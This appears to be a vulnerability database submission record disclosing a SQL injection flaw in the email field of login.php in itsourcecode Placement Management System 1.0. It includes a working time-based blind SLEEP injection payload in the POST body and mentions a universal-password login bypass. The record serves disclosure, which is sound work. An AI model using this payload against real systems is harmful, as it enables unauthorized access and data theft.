| Title | itsourcecode Placement Management System 1.0 SQLi |
|---|---|
| Description | In the login.php file, the email field is not properly sanitized, which may lead to SQL injection vulnerabilities. Additionally, as long as there is any data in the users table of the database, it is possible to log in using a universal password.<br>PoC:<br>Parameter: email (POST)<br>Type: time-based blind<br>Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br>Payload: `[email protected]#' AND (SELECT 3451 FROM (SELECT(SLEEP(5)))zIEe) AND 'NilV'='NilV&pass=123` |
| Source | ⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE11-1.md |
| User | Dee.Mirage (UID 71702) |
| Submission | 07/31/2024 04:15 PM (2 years ago) |
| Moderation | 08/03/2024 08:49 AM (3 days later) |
| Status | Accepted |
| VulDB Entry | 273540 [itsourcecode Placement Management System 1.0 login.php email SQL injection] |
| Points | 20 |